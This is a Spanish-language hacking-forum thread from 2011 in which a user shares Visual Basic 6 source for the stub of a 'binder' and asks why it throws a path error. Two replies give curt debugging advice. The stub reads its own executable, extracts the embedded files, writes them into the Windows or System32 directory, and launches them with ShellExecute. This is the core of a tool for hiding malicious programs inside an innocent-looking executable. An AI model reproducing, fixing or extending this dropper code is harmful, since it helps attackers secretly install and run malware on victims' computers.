elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  creacion de binder
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: creacion de binder  (Leído 2,787 veces)
elguast

Desconectado Desconectado

Mensajes: 110


Ver Perfil
creacion de binder
« en: 13 Noviembre 2011, 19:48 pm »

Hola compañeros,estoy haciendo un binder en visual basic 6.
Tengo un problemilla cuando junto los dos archivos y los ejecuto me da error.

Error 76 en tiempo de ejecucion no se ha encontrado la ruta de acceso.

Aqui os pongo el code del stub.



Citar
Private Declare Function ShellExecute Lib "shell32.dll" Alias _
    "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, _
    ByVal lpFile As String, ByVal lpParameters As String, _
    ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Dim con1 As String
Dim con2 As String, curts As Integer
Dim dast As String, dasa() As String, dasa2() As String, sinqi As String
Dim cile As String, nom As String, excile As String, ejcile As String

Private Sub Form_Load()
curts = FreeFile
con1 = "kfhbiubfevgwubog,lnl,myp"
con2 = "eogirnignrnhkrnhleknñenhn"
sinqi = App.Path & "\" & App.EXEName & ".exe"

Open sinqi For Binary As curts
 dast = Space(LOF(curts))
Get curts, , dast
Close curts

dasa() = Split(dast, con1)

For i = 1 To UBound(dasa)

dasa2() = Split(dasa(i), con2)

For x = 0 To UBound(dasa2)

 Select Case x
 
 Case 0 'archivo
 cile = dasa2(x)
 
  Case 1 'nombre del archivo
 nom = dasa2(x)


 Case 2 'ruta extraccion

    Select Case dasa2(x)
    Case "Windows"
    excile = Environ("WINDIR")
   
    Case "System32"
    excile = Environ("WINDIR") & "\system32"
   
    Case "Disco Local"
    excile = Environ("WINDIR")
   
    Case Else
   
    excile = dasa2(x)
    End Select
   
Case 3 ' si se ejecuta o no
ejcile = dasa2(x)

End Select

Next x


Open excile & "\" & nom For Binary As curts
 Put curts, , cile
Close curts

If ejcile = "Si" Then
ShellExecute 0, vbNullString, excile & "\" & nom, vbNullString, vbNullString, 1
Else
End If

Next i
End
End Sub


En línea

Unbr0ken

Desconectado Desconectado

Mensajes: 248



Ver Perfil
Re: creacion de binder
« Respuesta #1 en: 13 Noviembre 2011, 21:16 pm »

...


No revisé ni la cuarta parte del código, me provoca asco VB; Este tema está en una sección errónea, y según dices: "Error 76 en tiempo de ejecucion no se ha encontrado la ruta de acceso."

Pues la solución es revisar las rutas antes de compilar/depurar/bindear.


En línea

Cita de: Snowcrash
Discutir con desconocidos por internet es un ejercicio de imbéciles; todos acaban siendo quinceañeros arrogantes con cantidades infinitas de tiempo libre.

NO resuelvo dudas vía MP, para algo está el foro.
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: creacion de binder
« Respuesta #2 en: 14 Noviembre 2011, 08:02 am »

me provoca asco VB.

xP... yo difiero y solo digo que no me gusta como esta este codigo... esta TODO MAL PLANTEADO.

Pues la solución es revisar las rutas antes de compilar/depurar/bindear.

Solo depura tu codigo... el error ya te dijo que onda, aprende a LEER.

Dulces Lunas!¡.
En línea

The Dark Shadow is my passion.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
binder en vb « 1 2 »
Programación Visual Basic
loco5 10 6,364 Último mensaje 26 Septiembre 2005, 19:49 pm
por Kizar
Binder « 1 2 »
Programación Visual Basic
Thaorius 11 4,198 Último mensaje 8 Octubre 2005, 02:18 am
por NYlOn
SOURCE BINDER
Programación Visual Basic
Kizar 1 1,360 Último mensaje 9 Marzo 2006, 21:40 pm
por BenRu
NYP-Binder 1.0 « 1 2 3 »
Programación Visual Basic
ssvnyp 20 6,229 Último mensaje 20 Julio 2007, 09:42 am
por ActiveSheet
Nyp-Binder 1.5
Programación Visual Basic
ssvnyp 6 2,016 Último mensaje 25 Julio 2007, 14:16 pm
por Tughack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines